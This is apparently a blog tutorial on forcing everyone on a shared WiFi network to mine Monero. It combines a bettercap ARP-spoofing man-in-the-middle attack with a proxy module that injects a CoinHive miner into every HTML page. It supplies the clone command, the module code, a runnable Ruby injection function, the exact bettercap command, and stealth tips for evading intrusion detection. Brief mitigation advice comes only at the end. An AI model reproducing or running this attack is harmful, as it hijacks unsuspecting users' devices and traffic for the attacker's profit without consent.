Force an entire network to mine #Monero, with #Bettercap and a single command.

Previously I posted about using the #CoffeeMiner tool to run a self-hosted variant of #CoinHive (to get around attempts at blocking it) together with an #MiTM attack to force other network users into mining #Monero for you.

One or two people mentioned that this is a bit much to set up on the fly, since every location is different. As a trade-off I checked the latest bettercap proxy modules, and someone has already written a proxy module that silently injects CoinHive, with your site key, into the HTML head of every page. All that is now required is the single command below, which makes for a highly effective attack. Combined with the ebay_passive_income module this could be attractive for a hostel, hotel or any business that provides free WiFi and wants to generate some extra revenue, though there are ethical questions to be asked. You could also limit the process so it does not tamper with SSL at all, by passing only plain HTTP through a transparent proxy such as squid, or through bettercap itself.

Open a terminal and pull down the bettercap-proxy-modules git repository:

git clone https://github.com/evilsocket/bettercap-proxy-modules.git

Below is the relevant code from the makemoney.rb module. It pulls down coin.js (the CoinHive library), appends a few variables to it including your site key, and injects the result into each HTML response:


@@coinkey = nil

# registers the --coin-key command line option with bettercap
def self.on_options(opts)
  opts.on( '--coin-key KEY', 'Your site key on coinhive.' ) do |v|
    @@coinkey = v
  end
end

# the CoinHive library source; the module downloads it (that step is not shown here)
@loadcoinhive = CoinHive.js
# start an anonymous miner bound to your site key (double quotes so #{} interpolates)
@jscontent = "var miner = new CoinHive.Anonymous('#{@@coinkey}'); miner.start();"
# the script that gets injected: library first, then the start call
@jsfile = "#{@loadcoinhive}#{@jscontent}"
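The injection step itself is not shown in the snippet above, so here is the logic the post describes, reduced to plain Ruby that runs offline. This is an added example, not code from makemoney.rb or from bettercap: the CoinHive library source is replaced by a constructed stub string, and the proxied HTTP response by a body plus content type, both assumptions of this example. It adds the checks a proxy module needs so that it does not corrupt non-HTML responses or inject twice, plus a simple scan a defender can run over a received page.

```ruby
# Added example (not the makemoney.rb module): the injection logic the post
# describes, as a plain function so it can be run and tested offline.
# Constructed stand-in for the downloaded coinhive library; the real module
# fetches the actual library source over the network.
COINHIVE_LIB_STUB = '/* constructed stand-in for coinhive.min.js */'.freeze

# Build the <script> payload: library source followed by the start call that
# binds the site key. Same shape as @jsfile in the module.
def miner_payload(coin_key)
  js = "#{COINHIVE_LIB_STUB}var miner = new CoinHive.Anonymous('#{coin_key}'); miner.start();"
  "<script>#{js}</script>"
end

# Inject into a response only when it is an HTML document with a </head> tag.
# Images, JSON, JavaScript, or HTML without a head are returned untouched so
# the proxy does not break them, and a page that already carries the miner is
# not injected a second time.
def inject_miner(body, content_type, coin_key)
  return body unless content_type.to_s.start_with?('text/html')
  return body unless body.include?('</head>')
  return body if body.include?("CoinHive.Anonymous('#{coin_key}')")
  body.sub('</head>', "#{miner_payload(coin_key)}</head>")
end

# Defender side: a received page contains an injected anonymous miner if the
# start call is present in its markup.
def contains_miner?(body)
  body.include?('CoinHive.Anonymous(')
end

if __FILE__ == $PROGRAM_NAME
  page = '<html><head><title>Free WiFi</title></head><body>Welcome</body></html>'
  injected = inject_miner(page, 'text/html; charset=utf-8', 'YOUR_KEY_HERE')
  puts injected
  puts "miner present: #{contains_miner?(injected)}"
end
```

The content-type and `</head>` guards are what keep the proxy from corrupting binary or script responses; the idempotence check matters because a single page load can pass the same HTML through the proxy more than once (redirects, retries).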

Once you have the repository cloned, switch into the folder containing the modules, connect to your free WiFi (at a hotel, on campus, ...) and run this command:


: ~># bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE"

Bettercap will then silently inject your miner into all HTTP traffic as it is transparently proxied through the attack machine during the MiTM. For more stealth you can add --no-sslstrip to the command so that HTTPS connections are not downgraded; that reduces user disruption and the chance of tripping an IDS, at the cost of only reaching pages served over plain HTTP.

To mitigate this type of attack, install extensions such as HTTPS Everywhere and NoScript in your browser to keep your traffic on HTTPS and control which scripts may execute; a site served over HTTPS with HSTS cannot be downgraded and so cannot have the miner injected. Furthermore, check whether your internet gateway or router supports client isolation, which stops other clients on the same WiFi from talking to your machine directly and therefore from ARP spoofing it.